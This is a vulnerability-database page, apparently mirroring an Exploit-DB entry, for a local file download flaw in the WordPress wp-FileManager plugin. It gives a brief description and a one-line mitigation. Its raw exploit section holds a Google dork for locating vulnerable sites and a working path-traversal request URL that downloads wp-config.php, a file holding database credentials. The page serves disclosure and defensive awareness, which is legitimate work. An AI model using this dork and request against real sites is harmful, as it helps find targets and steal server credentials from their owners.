header-logo
Suggest Exploit
vendor:
wp-FileManager
by:
ByEge
7,5
CVSS
HIGH
Local File Download
434
CWE
Product Name: wp-FileManager
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
Unknown

WordPress wp-FileManager Local File Download Vulnerability

A vulnerability in the Wordpress wp-FileManager plugin allows an attacker to download any file from the server. In order for this to work, the 'Allow Download' setting must be checked in the FileManager's settings.

Mitigation:

Disable the 'Allow Download' setting in the FileManager's settings.
Source

Exploit-DB raw data:

Title: Wordpress wp-FileManager Local File Download Vulnerability
Author: ByEge
Download: http://wordpress.org/extend/plugins/wp-filemanager/
Test Platform: Linux
Images: http://j1305.hizliresim.com/19/f/n0xxf.jpg
Vuln. Plat.: Web Application



Google Dorks: inurl:wp-content/plugins/wp-filemanager/
Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download

# Exploit-DB Note:
# In order for this to work, the "Allow Download" setting must be checked in the FileManager's settings.

Navigation

Suggest Exploit

Services By CQR